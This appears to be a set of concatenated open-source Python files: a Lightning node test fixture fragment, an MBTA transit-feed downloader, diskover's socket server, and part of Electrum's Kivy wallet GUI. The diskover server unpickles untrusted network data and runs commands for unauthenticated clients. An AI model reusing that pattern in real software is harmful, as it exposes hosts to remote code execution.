port=port, random_hsm=random_hsm, node_id=node_id
)
# If we have a disconnect string, dump it to a file for daemon.
if disconnect:
daemon.disconnect_file = os.path.join(lightning_dir, "dev_disconnect")
with open(daemon.disconnect_file, "w") as f:
f.write("\n".join(disconnect))
daemon.opts["dev-disconnect"] = "dev_disconnect"
if log_all_io:
assert DEVELOPER
daemon.env["LIGHTNINGD_DEV_LOG_IO"] = "1"
daemon.opts["log-level"] = "io"
if DEVELOPER:
daemon.opts["dev-fail-on-subdaemon-fail"] = None
daemon.env["LIGHTNINGD_DEV_MEMLEAK"] = "1"
if os.getenv("DEBUG_SUBD"):
daemon.opts["dev-debugger"] = os.getenv("DEBUG_SUBD")
if VALGRIND:
daemon.env["LIGHTNINGD_DEV_NO_BACKTRACE"] = "1"
if not may_reconnect:
daemon.opts["dev-no-reconnect"] = None
if options is not None:
daemon.opts.update(options)
rpc = LightningRpc(socket_path, self.executor)
node = LightningNode(daemon, rpc, self.bitcoind, self.executor, may_fail=may_fail,
may_reconnect=may_reconnect)
# Regtest estimatefee are unusable, so override.
node.set_feerates(feerates, False)
self.nodes.append(node)
if VALGRIND:
node.daemon.cmd_prefix = [
'valgrind',
'-q',
'--trace-children=yes',
'--trace-children-skip=*bitcoin-cli*',
'--error-exitcode=7',
'--log-file={}/valgrind-errors.%p'.format(node.daemon.lightning_dir)
]
if start:
try:
node.start()
except Exception:
node.daemon.stop()
raise
return node
def line_graph(self, num_nodes, fundchannel=True, fundamount=10**6, announce=False, opts=None):
""" Create nodes, connect them and optionally fund channels.
"""
nodes = self.get_nodes(num_nodes, opts=opts)
bitcoin = nodes[0].bitcoin
connections = [(nodes[i], nodes[i + 1]) for i in range(0, num_nodes - 1)]
for src, dst in connections:
src.rpc.connect(dst.info['id'], 'localhost', dst.port)
# If we're returning now, make sure dst all show connections in
# getpeers.
if not fundchannel:
for src, dst in connections:
dst.daemon.wait_for_log('openingd-{} chan #[0-9]*: Handed peer, entering loop'.format(src.info['id']))
return nodes
# If we got here, we want to fund channels
for src, dst in connections:
addr = src.rpc.newaddr()['address']
src.bitcoin.rpc.sendtoaddress(addr, (fundamount + 1000000) / 10**8)
bitcoin.generate_block(1)
for src, dst in connections:
wait_for(lambda: len(src.rpc.listfunds()['outputs']) > 0)
tx = src.rpc.fundchannel(dst.info['id'], fundamount)
wait_for(lambda: tx['txid'] in bitcoin.rpc.getrawmempool())
# Confirm all channels and wait for them to become usable
bitcoin.generate_block(1)
scids = []
for src, dst in connections:
wait_for(lambda: src.channel_state(dst) == 'CHANNELD_NORMAL')
scid = src.get_channel_scid(dst)
src.daemon.wait_for_log(r'Received channel_update for channel {scid}\(.\) now ACTIVE'.format(scid=scid))
scids.append(scid)
if not announce:
return nodes
bitcoin.generate_block(5)
def both_dirs_ready(n, scid):
resp = n.rpc.listchannels(scid)
return [a['active'] for a in resp['channels']] == [True, True]
# Make sure everyone sees all channels: we can cheat and
# simply check the ends (since it's a line).
wait_for(lambda: both_dirs_ready(nodes[0], scids[-1]))
wait_for(lambda: both_dirs_ready(nodes[-1], scids[0]))
# Make sure we have all node announcements, too (just check ends)
for n in nodes:
for end in (nodes[0], nodes[-1]):
wait_for(lambda: 'alias' in only_one(end.rpc.listnodes(n.info['id'])['nodes']))
return nodes
def killall(self, expected_successes):
"""Returns true if every node we expected to succeed actually succeeded"""
unexpected_fail = False
for i in range(len(self.nodes)):
leaks = None
# leak detection upsets VALGRIND by reading uninitialized mem.
# If it's dead, we'll catch it below.
if not VALGRIND:
try:
# This also puts leaks in log.
leaks = self.nodes[i].rpc.dev_memleak()['leaks']
except Exception:
pass
try:
self.nodes[i].stop()
except Exception:
if expected_successes[i]:
unexpected_fail = True
if leaks is not None and len(leaks) != 0:
raise Exception("Node {} has memory leaks: {}"
.format(self.nodes[i].daemon.lightning_dir, leaks))
return not unexpected_fail
|
download_mbta_gtfsrt.py
|
"""Script to download MBTA vehicle positions every 5 seconds
during 1 minute
"""
import os
import time
import threading
from datetime import datetime
import traceback
import requests
from common import Settings, s3, utils
__author__ = "Alex Ganin"
def download_feed(dirName, url, *args):
"""Downloads a real-time vehicle positions file to the local storage
and then uploads it to S3 and removes from the local storage
Args:
dirName: the local directory where the file will be saved initially
url: the URL to download the file from
*args: placeholder for any additional arguments, unused
"""
fName = datetime.now().strftime("%Y%m%d-%H%M%S.pb")
r = requests.get(url)
fPath = os.path.join(Settings.ProjPath, "pb", dirName, fName)
with open(fPath, "wb") as handle:
handle.write(r.content)
try:
# always use '/' as path separator in S3
objKey = '/'.join(["pb", dirName, fName.replace('-', '/')])
s3Mgr = s3.S3Mgr()
s3Mgr.upload_file(fPath, objKey)
os.remove(fPath)
except Exception: # pylint: disable=broad-except
log = utils.get_logger()
log.warning("Error while saving the file %s to S3 and/or DB", fPath)
log.warning(traceback.format_exc())
pass # do not interfere with other threads that might succeed
def main():
"""Downloads the vehicle positions feed from MBTA
12 times during 1 minute by running a new thread every 5 seconds
"""
Feeds = [
("VehiclePos", "https://cdn.mbta.com/realtime/VehiclePositions.pb", 5)
]
for feedTpl in Feeds:
p = os.path.join(Settings.ProjPath, "pb", feedTpl[0])
if not os.path.exists(p):
os.makedirs(p)
threads = []
for sec in range(0, 59, 5):
for feedTpl in Feeds:
if sec % feedTpl[2] != 0:
continue
t = threading.Thread(target=download_feed, args=feedTpl)
t.start()
threads.append(t)
if sec == 55:
break
time.sleep(5)
for t in threads:
t.join()
if __name__ == "__main__":
main()
|
diskover_socket_server.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""diskover - Elasticsearch file system crawler
diskover is a file system crawler that index's
your file metadata into Elasticsearch.
See README.md or https://github.com/shirosaidev/diskover
for more information.
Copyright (C) Chris Park 2017-2018
diskover is released under the Apache 2.0 license. See
LICENSE for the full license text.
"""
from diskover import q_crawl, adaptive_batch, config, get_time
from diskover_bot_module import scrape_tree_meta
import socket
import subprocess
try:
import queue as Queue
except ImportError:
import Queue
import threading
import uuid
import json
import time
import sys
import pickle
import struct
# dict to hold socket tasks
socket_tasks = {}
# list of socket client
clientlist = []
def socket_thread_handler(threadnum, q, cliargs, logger):
"""This is the socket thread handler function.
It runs the command msg sent from client.
"""
BUFF = 1024
while True:
try:
c = q.get()
clientsock, addr = c
logger.debug(clientsock)
logger.debug(addr)
data = clientsock.recv(BUFF)
data = data.decode('utf-8')
logger.debug('received data: %s' % data)
if not data:
q.task_done()
# close connection to client
clientsock.close()
logger.info("[thread-%s]: %s closed connection" % (threadnum, str(addr)))
continue
# check if ping msg
if data == 'ping':
logger.info("[thread-%s]: Got ping from %s" % (threadnum, str(addr)))
# send pong reply
message = b'pong'
clientsock.send(message)
logger.debug('sending data: %s' % message)
else:
# strip away any headers sent by curl
data = data.split('\r\n')[-1]
logger.info("[thread-%s]: Got command from %s" % (threadnum, str(addr)))
# load json and store in dict
command_dict = json.loads(data)
logger.debug(command_dict)
# run command from json data
run_command(threadnum, command_dict, clientsock, cliargs, logger)
q.task_done()
# close connection to client
clientsock.close()
logger.info("[thread-%s]: %s closed connection" % (threadnum, str(addr)))
except (ValueError, TypeError) as e:
q.task_done()
logger.error("[thread-%s]: Invalid JSON from %s: (%s)" % (threadnum, str(addr), e))
message = b'{"msg": "error", "error": "Invalid JSON caused by %s"}\n' % str(e).encode('utf-8')
clientsock.send(message)
logger.debug(message)
# close connection to client
clientsock.close()
logger.info("[thread-%s]: %s closed connection" % (threadnum, str(addr)))
pass
except socket.error as e:
q.task_done()
logger.error("[thread-%s]: Socket error (%s)" % (threadnum, e))
# close connection to client
clientsock.close()
logger.info("[thread-%s]: %s closed connection" % (threadnum, str(addr)))
pass
def recvall(sock, count):
buf = b''
while count:
newbuf = sock.recv(count)
if not newbuf: return None
buf += newbuf
count -= len(newbuf)
return buf
def recv_one_message(sock):
lengthbuf = recvall(sock, 4)
if not lengthbuf:
return None
length, = struct.unpack('!I', lengthbuf)
return recvall(sock, length)
def socket_thread_handler_twc(threadnum, q, q_kill, lock, rootdir, num_sep, level,
batchsize, cliargs, logger, reindex_dict):
"""This is the socket thread handler tree walk client function.
Stream of directory listings (pickle) from diskover treewalk
client connections are enqueued to redis rq queue.
"""
while True:
try:
c = q.get()
clientsock, addr = c
logger.debug(clientsock)
logger.debug(addr)
totalfiles = 0
while True:
data = recv_one_message(clientsock)
if not data:
break
if data == b'SIGKILL' or data == 'SIGKILL':
q_kill.put(b'SIGKILL')
break
# unpickle data sent from client
data_decoded = pickle.loads(data)
logger.debug(data_decoded)
# enqueue to redis
batch = []
for root, dirs, files in data_decoded:
files_len = len(files)
totalfiles += files_len
# check for empty dirs
if len(dirs) == 0 and len(files) == 0 and not cliargs['indexemptydirs']:
continue
batch.append((root, dirs, files))
batch_len = len(batch)
if batch_len >= batchsize or (cliargs['adaptivebatch'] and totalfiles >= config['adaptivebatch_maxfiles']):
q_crawl.enqueue(scrape_tree_meta, args=(batch, cliargs, reindex_dict,),
result_ttl=config['redis_ttl'])
if cliargs['debug'] or cliargs['verbose']:
logger.info("enqueued batchsize: %s (batchsize: %s)" % (batch_len, batchsize))
del batch[:]
totalfiles = 0
if cliargs['adaptivebatch']:
batchsize = adaptive_batch(q_crawl, cliargs, batchsize)
if cliargs['debug'] or cliargs['verbose']:
logger.info("batchsize set to: %s" % batchsize)
if len(batch) > 0:
# add any remaining in batch to queue
q_crawl.enqueue(scrape_tree_meta, args=(batch, cliargs, reindex_dict,), result_ttl=config['redis_ttl'])
del batch[:]
# close connection to client
clientsock.close()
logger.info("[thread-%s]: %s closed connection" % (threadnum, str(addr)))
q.task_done()
except socket.error as e:
logger.error("[thread-%s]: Socket error (%s)" % (threadnum, e))
def start_socket_server(cliargs, logger):
"""This is the start socket server function.
It opens a socket and waits for remote commands.
"""
global clientlist
# set thread/connection limit
max_connections = config['listener_maxconnections']
# Queue for socket threads
q = Queue.Queue(maxsize=max_connections)
try:
# create TCP socket object
serversock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
serversock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
host = config['listener_host'] # default is localhost
port = config['listener_port'] # default is 9999
# bind to port
serversock.bind((host, port))
# start listener
serversock.listen(max_connections)
# set up the threads and start them
for i in range(max_connections):
# create thread
t = threading.Thread(target=socket_thread_handler, args=(i, q, cliargs, logger,))
t.daemon = True
t.start()
while True:
logger.info("Waiting for connection, listening on %s port %s TCP (ctrl-c to shutdown)"
% (str(host), str(port)))
# establish connection
clientsock, addr = serversock.accept()
logger.debug(clientsock)
logger.debug(addr)
logger.info("Got a connection from %s" % str(addr))
# add client to list
client = (clientsock, addr)
clientlist.append(client)
# add task to Queue
q.put(client)
except socket.error as e:
serversock.close()
logger.error("Error opening socket (%s)" % e)
sys.exit(1)
except KeyboardInterrupt:
print('\nCtrl-c keyboard interrupt received, shutting down...')
q.join()
serversock.close()
sys.exit(0)
def start_socket_server_twc(rootdir_path, num_sep, level, batchsize, cliargs, logger, reindex_dict):
"""This is the start socket server tree walk function.
It opens a socket and waits for diskover tree walk client
connections.
"""
global clientlist
# set thread/connection limit
max_connections = config['listener_maxconnections']
# Queue for socket threads
q = Queue.Queue(maxsize=max_connections)
q_kill = Queue.Queue()
lock = threading.Lock()
try:
# create TCP socket object
serversock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
serversock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
host = config['listener_host'] # default is localhost
if cliargs['twcport']:
port = cliargs['twcport']
else:
port = config['listener_twcport'] # default is 9998
# bind to port
serversock.bind((host, port))
# start listener
serversock.listen(max_connections)
# set up the threads and start them
for i in range(max_connections):
t = threading.Thread(
target=socket_thread_handler_twc,
args=(i, q, q_kill, lock, rootdir_path, num_sep,
level, batchsize, cliargs, logger, reindex_dict,))
t.daemon = True
t.start()
starttime = time.time()
while True:
if q_kill.qsize() > 0:
logger.info("Received signal to shutdown socket server")
q.join()
serversock.close()
return starttime
logger.info("Waiting for connection, listening on %s port %s TCP (ctrl-c to shutdown)"
% (str(host), str(port)))
# establish connection
clientsock, addr = serversock.accept()
logger.debug(clientsock)
logger.debug(addr)
logger.info("Got a connection from %s" % str(addr))
# add client to list
client = (clientsock, addr)
clientlist.append(client)
# set start time to first connection
if len(clientlist) == 1:
starttime = time.time()
# put client into Queue
q.put(client)
except socket.error as e:
serversock.close()
logger.error("Error opening socket (%s)" % e)
sys.exit(1)
except KeyboardInterrupt:
print('\nCtrl-c keyboard interrupt received, shutting down...')
serversock.close()
sys.exit(0)
def run_command(threadnum, command_dict, clientsock, cliargs, logger):
"""This is the run command function.
It runs commands from the listener socket
using values in command_dict.
"""
global socket_tasks
global clientlist
# try to get index name from command or use from diskover config file
try:
index = str(command_dict['index'])
except KeyError:
index = str(config['index'])
pass
# try to get worker batch size from command or use default
try:
batchsize = str(command_dict['batchsize'])
except KeyError:
batchsize = str(cliargs['batchsize'])
pass
# try to get adaptive batch option from command or use default
try:
adaptivebatch = str(command_dict['adaptivebatch'])
except KeyError:
adaptivebatch = str(cliargs['adaptivebatch'])
pass
try:
action = command_dict['action']
pythonpath = config['python_path']
diskoverpath = config['diskover_path']
# set up command for different action
if action == 'crawl':
path = command_dict['path']
cmd = [pythonpath, diskoverpath, '-b', batchsize,
'-i', index, '-d', path, '-q', '-F']
elif action == 'finddupes':
cmd = [pythonpath, diskoverpath, '-b', batchsize,
'-i', index, '--finddupes', '-q', '-F']
elif action == 'hotdirs':
index2 = str(command_dict['index2'])
cmd = [pythonpath, diskoverpath, '-b', batchsize,
'-i', index, '--hotdirs', index2, '-q', '-F']
elif action == 'reindex':
try:
recursive = command_dict['recursive']
except KeyError:
recursive = 'false'
pass
path = command_dict['path']
if recursive == 'true':
cmd = [pythonpath, diskoverpath, '-b', batchsize,
'-i', index, '-d', path, '-R', '-q', '-F']
else:
cmd = [pythonpath, diskoverpath, '-b', batchsize,
'-i', index, '-d', path, '-r', '-q', '-F']
elif action == 'updatedirsizes':
try:
recursive = command_dict['recursive']
except KeyError:
recursive = 'false'
pass
if recursive == 'true':
cmd = [pythonpath, diskoverpath, '-b', batchsize,
'-i', index, '--dircalcsonly', '-q', '-F']
else:
path = command_dict['path']
cmd = [pythonpath, diskoverpath, '-b', batchsize,
'-i', index, '-d', path, '--dircalcsonly', '--maxdcdepth', '0', '-q', '-F']
elif action == 'kill':
taskid = command_dict['taskid']
logger.info("[thread-%s]: Kill task message received! (taskid:%s)",
threadnum, taskid)
# do something here to kill task (future)
message = b'{"msg": "taskkilled"}\n'
clientsock.send(message)
return
else:
logger.warning("Unknown action")
message = b'{"error": "unknown action"}\n'
clientsock.send(message)
return
# add adaptive batch
if (adaptivebatch == "True" or adaptivebatch == "true"):
cmd.append('-a')
# run command using subprocess
starttime = time.time()
taskid = str(uuid.uuid4()).encode('utf-8')
# start process
process = subprocess.Popen(cmd, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
# add process to socket_tasks dict
socket_tasks[taskid] = process
message = b'{"msg": "taskstart", "taskid": "' + taskid + b'"}\n'
clientsock.send(message)
logger.info("[thread-%s]: Running command (taskid:%s)",
threadnum, taskid.decode('utf-8'))
logger.info(cmd)
output, error = process.communicate()
# send exit msg to client
exitcode = str(process.returncode).encode('utf-8')
logger.debug('Command output:')
logger.debug(output.decode('utf-8'))
logger.debug('Command error:')
logger.debug(error.decode('utf-8'))
elapsedtime = str(get_time(time.time() - starttime)).encode('utf-8')
logger.info("Finished command (taskid:%s), exit code: %s, elapsed time: %s"
% (taskid.decode('utf-8'), exitcode.decode('utf-8'), elapsedtime.decode('utf-8')))
message = b'{"msg": "taskfinish", "taskid": "%s", "exitcode": %s, "elapsedtime": "%s"}\n' \
% (taskid, exitcode, elapsedtime)
clientsock.send(message)
except ValueError:
logger.warning("Value error")
message = b'{"error": "value error"}\n'
clientsock.send(message)
pass
except socket.error as e:
logger.error("[thread-%s]: Socket error (%s)" % (threadnum, e))
pass
|
main_window.py
|
import re
import os
import sys
import time
import datetime
import traceback
from decimal import Decimal
import threading
import asyncio
from typing import TYPE_CHECKING, Optional, Union, Callable, Sequence
from electrum.storage import WalletStorage, StorageReadWriteError
from electrum.wallet_db import WalletDB
from electrum.wallet import Wallet, InternalAddressCorruption, Abstract_Wallet
from electrum.wallet import update_password_for_directory
from electrum.plugin import run_hook
from electrum import util
from electrum.util import (profiler, InvalidPassword, send_exception_to_crash_reporter,
format_satoshis, format_satoshis_plain, format_fee_satoshis,
maybe_extract_bolt11_invoice)
from electrum.invoices import PR_PAID, PR_FAILED
from electrum import blockchain
from electrum.network import Network, TxBroadcastError, BestEffortRequestFailed
from electrum.interface import PREFERRED_NETWORK_PROTOCOL, ServerAddr
from electrum.logging import Logger
from electrum.gui import messages
from .i18n import _
from . import KIVY_GUI_PATH
from kivy.app import App
from kivy.core.window import Window
from kivy.utils import platform
from kivy.properties import (OptionProperty, AliasProperty, ObjectProperty,
StringProperty, ListProperty, BooleanProperty, NumericProperty)
from kivy.cache import Cache
from kivy.clock import Clock
from kivy.factory import Factory
from kivy.metrics import inch
from kivy.lang import Builder
from .uix.dialogs.password_dialog import OpenWalletDialog, ChangePasswordDialog, PincodeDialog, PasswordDialog
from .uix.dialogs.choice_dialog import ChoiceDialog
## lazy imports for factory so that widgets can be used in kv
#Factory.register('InstallWizard', module='electrum.gui.kivy.uix.dialogs.installwizard')
#Factory.register('InfoBubble', module='electrum.gui.kivy.uix.dialogs')
#Factory.register('OutputList', module='electrum.gui.kivy.uix.dialogs')
#Factory.register('OutputItem', module='electrum.gui.kivy.uix.dialogs')
from .uix.dialogs.installwizard import InstallWizard
from .uix.dialogs import InfoBubble, crash_reporter
from .uix.dialogs import OutputList, OutputItem
from .uix.dialogs import TopLabel, RefLabel
from .uix.dialogs.question import Question
#from kivy.core.window import Window
#Window.softinput_mode = 'below_target'
# delayed imports: for startup speed on android
notification = app = ref = None
# register widget cache for keeping memory down timeout to forever to cache
# the data
Cache.register('electrum_widgets', timeout=0)
from kivy.uix.screenmanager import Screen
from kivy.uix.tabbedpanel import TabbedPanel
from kivy.uix.label import Label
from kivy.core.clipboard import Clipboard
Factory.register('TabbedCarousel', module='electrum.gui.kivy.uix.screens')
# Register fonts without this you won't be able to use bold/italic...
# inside markup.
from kivy.core.text import Label
Label.register(
'Roboto',
KIVY_GUI_PATH + '/data/fonts/Roboto.ttf',
KIVY_GUI_PATH + '/data/fonts/Roboto.ttf',
KIVY_GUI_PATH + '/data/fonts/Roboto-Bold.ttf',
KIVY_GUI_PATH + '/data/fonts/Roboto-Bold.ttf',
)
from electrum.util import (NoDynamicFeeEstimates, NotEnoughFunds,
BITCOIN_BIP21_URI_SCHEME, LIGHTNING_URI_SCHEME,
UserFacingException)
from .uix.dialogs.lightning_open_channel import LightningOpenChannelDialog
from .uix.dialogs.lightning_channels import LightningChannelsDialog, SwapDialog
if TYPE_CHECKING:
from . import ElectrumGui
from electrum.simple_config import SimpleConfig
from electrum.plugin import Plugins
from electrum.paymentrequest import PaymentRequest
class ElectrumWindow(App, Logger):
electrum_config = ObjectProperty(None)
language = StringProperty('en')
# properties might be updated by the network
num_blocks = NumericProperty(0)
num_nodes = NumericProperty(0)
server_host = StringProperty('')
server_port = StringProperty('')
num_chains = NumericProperty(0)
blockchain_name = StringProperty('')
fee_status = StringProperty('Fee')
balance = StringProperty('')
fiat_balance = StringProperty('')
is_fiat = BooleanProperty(False)
blockchain_forkpoint = NumericProperty(0)
lightning_gossip_num_peers = NumericProperty(0)
lightning_gossip_num_nodes = NumericProperty(0)
lightning_gossip_num_channels = NumericProperty(0)
lightning_gossip_num_queries = NumericProperty(0)
auto_connect = BooleanProperty(False)
def on_auto_connect(self, instance, x):
net_params = self.network.get_parameters()
net_params = net_params._replace(auto_connect=self.auto_connect)
self.network.run_from_another_thread(self.network.set_parameters(net_params))
def toggle_auto_connect(self, x):
self.auto_connect = not self.auto_connect
oneserver = BooleanProperty(False)
def on_oneserver(self, instance, x):
net_params = self.network.get_parameters()
net_params = net_params._replace(oneserver=self.oneserver)
self.network.run_from_another_thread(self.network.set_parameters(net_params))
def toggle_oneserver(self, x):
self.oneserver = not self.oneserver
proxy_str = StringProperty('')
def update_proxy_str(self, proxy: dict):
mode = proxy.get('mode')
host = proxy.get('host')
port = proxy.get('port')
self.proxy_str = (host + ':' + port) if mode else _('None')
def choose_server_dialog(self, popup):
protocol = PREFERRED_NETWORK_PROTOCOL
def cb2(server_str):
popup.ids.server_str.text = server_str
servers = self.network.get_servers()
server_choices = {}
for _host, d in sorted(servers.items()):
port = d.get(protocol)
if port:
server = ServerAddr(_host, port, protocol=protocol)
server_choices[server.net_addr_str()] = _host
ChoiceDialog(_('Choose a server'), server_choices, popup.ids.server_str.text, cb2).open()
def maybe_switch_to_server(self, server_str: str):
net_params = self.network.get_parameters()
try:
server = ServerAddr.from_str_with_inference(server_str)
if not server: raise Exception("failed to parse")
except Exception as e:
self.show_error(_("Invalid server details: {}").format(repr(e)))
return
net_params = net_params._replace(server=server)
self.network.run_from_another_thread(self.network.set_parameters(net_params))
def choose_blockchain_dialog(self, dt):
chains = self.network.get_blockchains()
def cb(name):
with blockchain.blockchains_lock: blockchain_items = list(blockchain.blockchains.items())
for chain_id, b in blockchain_items:
if name == b.get_name():
self.network.run_from_another_thread(self.network.follow_chain_given_id(chain_id))
chain_objects = [blockchain.blockchains.get(chain_id) for chain_id in chains]
chain_objects = filter(lambda b: b is not None, chain_objects)
names = [b.get_name() for b in chain_objects]
if len(names) > 1:
cur_chain = self.network.blockchain().get_name()
ChoiceDialog(_('Choose your chain'), names, cur_chain, cb).open()
use_rbf = BooleanProperty(False)
def on_use_rbf(self, instance, x):
self.electrum_config.set_key('use_rbf', self.use_rbf, True)
use_gossip = BooleanProperty(False)
def on_use_gossip(self, instance, x):
self.electrum_config.set_key('use_gossip', self.use_gossip, True)
if self.network:
if self.use_gossip:
self.network.start_gossip()
else:
self.network.run_from_another_thread(
self.network.stop_gossip())
use_change = BooleanProperty(False)
def on_use_change(self, instance, x):
if self.wallet:
self.wallet.use_change = self.use_change
self.wallet.db.put('use_change', self.use_change)
self.wallet.save_db()
use_unconfirmed = BooleanProperty(False)
def on_use_unconfirmed(self, instance, x):
self.electrum_config.set_key('confirmed_only', not self.use_unconfirmed, True)
use_recoverable_channels = BooleanProperty(True)
def on_use_recoverable_channels(self, instance, x):
self.electrum_config.set_key('use_recoverable_channels', self.use_recoverable_channels, True)
def switch_to_send_screen(func):
# try until send_screen is available
def wrapper(self, *args):
f = lambda dt: (bool(func(self, *args) and False) if self.send_screen else bool(self.switch_to('send') or True)) if self.wallet else True
Clock.schedule_interval(f, 0.1)
return wrapper
@switch_to_send_screen
def set_URI(self, uri):
self.send_screen.set_URI(uri)
@switch_to_send_screen
def set_ln_invoice(self, invoice):
self.send_screen.set_ln_invoice(invoice)
def on_new_intent(self, intent):
data = str(intent.getDataString())
scheme = str(intent.getScheme()).lower()
if scheme == BITCOIN_BIP21_URI_SCHEME:
self.set_URI(data)
elif scheme == LIGHTNING_URI_SCHEME:
self.set_ln_invoice(data)
def on_language(self, instance, language):
self.logger.info('language: {}'.format(language))
_.switch_lang(language)
def update_history(self, *dt):
if self.history_screen:
self.history_screen.update()
def on_quotes(self, d):
self.logger.info("on_quotes")
self._trigger_update_status()
self._trigger_update_history()
def on_history(self, d):
self.logger.info("on_history")
if self.wallet:
self.wallet.clear_coin_price_cache()
self._trigger_update_history()
def on_fee_histogram(self, *args):
self._trigger_update_history()
def on_request_status(self, event, wallet, key, status):
req = self.wallet.receive_requests.get(key)
if req is None:
return
if self.receive_screen:
if status == PR_PAID:
self.receive_screen.update()
else:
self.receive_screen.update_item(key, req)
if self.request_popup and self.request_popup.key == key:
self.request_popup.update_status()
if status == PR_PAID:
self.show_info(_('Payment Received') + '\n' + key)
self._trigger_update_history()
def on_invoice_status(self, event, wallet, key):
req = self.wallet.get_invoice(key)
if req is None:
return
status = self.wallet.get_invoice_status(req)
if self.send_screen:
if status == PR_PAID:
self.send_screen.update()
else:
self.send_screen.update_item(key, req)
if self.invoice_popup and self.invoice_popup.key == key:
self.invoice_popup.update_status()
def on_payment_succeeded(self, event, wallet, key):
description = self.wallet.get_label(key)
self.show_info(_('Payment succeeded') + '\n\n' + description)
self._trigger_update_history()
def on_payment_failed(self, event, wallet, key, reason):
self.show_info(_('Payment failed') + '\n\n' + reason)
def _get_bu(self):
return self.electrum_config.get_base_unit()
def _set_bu(self, value):
self.electrum_config.set_base_unit(value)
self._trigger_update_status()
self._trigger_update_history()
wallet_name = StringProperty(_('No Wallet'))
base_unit = AliasProperty(_get_bu, _set_bu)
fiat_unit = StringProperty('')
def on_fiat_unit(self, a, b):
self._trigger_update_history()
def decimal_point(self):
return self.electrum_config.get_decimal_point()
def btc_to_fiat(self, amount_str):
if not amount_str:
return ''
if not self.fx.is_enabled():
return ''
rate = self.fx.exchange_rate()
if rate.is_nan():
return ''
fiat_amount = self.get_amount(amount_str + ' ' + self.base_unit) * rate / pow(10, 8)
return "{:.2f}".format(fiat_amount).rstrip('0').rstrip('.')
def fiat_to_btc(self, fiat_amount):
if not fiat_amount:
return ''
rate = self.fx.exchange_rate()
if rate.is_nan():
return ''
satoshis = int(pow(10,8) * Decimal(fiat_amount) / Decimal(rate))
return format_satoshis_plain(satoshis, decimal_point=self.decimal_point())
def get_amount(self, amount_str):
a, u = amount_str.split()
assert u == self.base_unit
try:
x = Decimal(a)
except:
return None
p = pow(10, self.decimal_point())
return int(p * x)
_orientation = OptionProperty('landscape',
options=('landscape', 'portrait'))
def _get_orientation(self):
return self._orientation
orientation = AliasProperty(_get_orientation,
None,
bind=('_orientation',))
'''Tries to ascertain the kind of device the app is running on.
Cane be one of `tablet` or `phone`.
:data:`orientation` is a read only `AliasProperty` Defaults to 'landscape'
'''
_ui_mode = OptionProperty('phone', options=('tablet', 'phone'))
def _get_ui_mode(self):
return self._ui_mode
ui_mode = AliasProperty(_get_ui_mode,
None,
bind=('_ui_mode',))
'''Defines tries to ascertain the kind of device the app is running on.
Cane be one of `tablet` or `phone`.
:data:`ui_mode` is a read only `AliasProperty` Defaults to 'phone'
'''
def __init__(self, **kwargs):
# initialize variables
self._clipboard = Clipboard
self.info_bubble = None
self.nfcscanner = None
self.tabs = None
self.is_exit = False
self.wallet = None # type: Optional[Abstract_Wallet]
self.pause_time = 0
self.asyncio_loop = asyncio.get_event_loop()
self.password = None
self._use_single_password = False
self.resume_dialog = None
App.__init__(self)#, **kwargs)
Logger.__init__(self)
self.electrum_config = config = kwargs.get('config', None) # type: SimpleConfig
self.language = config.get('language', 'en')
self.network = network = kwargs.get('network', None) # type: Network
if self.network:
self.num_blocks = self.network.get_local_height()
self.num_nodes = len(self.network.get_interfaces())
net_params = self.network.get_parameters()
self.server_host = net_params.server.host
self.server_port = str(net_params.server.port)
self.auto_connect = net_params.auto_connect
self.oneserver = net_params.oneserver
self.proxy_config = net_params.proxy if net_params.proxy else {}
self.update_proxy_str(self.proxy_config)
self.plugins = kwargs.get('plugins', None) # type: Plugins
self.gui_object = kwargs.get('gui_object', None) # type: ElectrumGui
self.daemon = self.gui_object.daemon
self.fx = self.daemon.fx
self.use_rbf = config.get('use_rbf', True)
self.use_gossip = config.get('use_gossip', False)
self.use_unconfirmed = not config.get('confirmed_only', False)
# create triggers so as to minimize updating a max of 2 times a sec
self._trigger_update_wallet = Clock.create_trigger(self.update_wallet, .5)
self._trigger_update_status = Clock.create_trigger(self.update_status, .5)
self._trigger_update_history = Clock.create_trigger(self.update_history, .5)
self._trigger_update_interfaces = Clock.create_trigger(self.update_interfaces, .5)
self._periodic_update_status_during_sync = Clock.schedule_interval(self.update_wallet_synchronizing_progress, .5)
# cached dialogs
self._settings_dialog = None
self._channels_dialog = None
self._addresses_dialog = None
self.set_fee_status()
self.invoice_popup = None
self.request_popup = None
def on_pr(self, pr: 'PaymentRequest'):
if not self.wallet:
self.show_error(_('No wallet loaded.'))
return
if pr.verify(self.wallet.contacts):
key = pr.get_id()
invoice = self.wallet.get_invoice(key) # FIXME wrong key...
if invoice and self.wallet.get_invoice_status(invoice) == PR_PAID:
self.show_error("invoice already paid")
self.send_screen.do_clear()
elif pr.has_expired():
self.show_error(_('Payment request has expired'))
else:
self.switch_to('send')
self.send_screen.set_request(pr)
else:
self.show_error("invoice error:" + pr.error)
self.send_screen.do_clear()
def on_qr(self, data):
from electrum.ravencoin import is_address
data = data.strip()
if is_address(data):
self.set_URI(data)
return
if data.lower().startswith(BITCOIN_BIP21_URI_SCHEME + ':'):
self.set_URI(data)
return
if data.lower().startswith('channel_backup:'):
self.import_channel_backup(data)
return
bolt11_invoice = maybe_extract_bolt11_invoice(data)
if bolt11_invoice is not None:
self.set_ln_invoice(bolt11_invoice)
return
# try to decode transaction
from electrum.transaction import tx_from_any
try:
tx = tx_from_any(data)
except:
tx = None
if tx:
self.tx_dialog(tx)
return
# show error
self.show_error("Unable to decode QR data")
def update_tab(self, name):
s = getattr(self, name + '_screen', None)
if s:
s.update()
@profiler
def update_tabs(self):
for name in ['send', 'history', 'receive']:
self.update_tab(name)
def switch_to(self, name):
s = getattr(self, name + '_screen', None)
panel = self.tabs.ids.panel
tab = self.tabs.ids[name + '_tab']
panel.switch_to(tab)
def show_request(self, is_lightning, key):
from .uix.dialogs.request_dialog import RequestDialog
self.request_popup = RequestDialog('Request', key)
self.request_popup.open()
def show_invoice(self, is_lightning, key):
from .uix.dialogs.invoice_dialog import InvoiceDialog
invoice = self.wallet.get_invoice(key)
if not invoice:
return
data = invoice.invoice if is_lightning else key
self.invoice_popup = InvoiceDialog('Invoice', data, key)
self.invoice_popup.open()
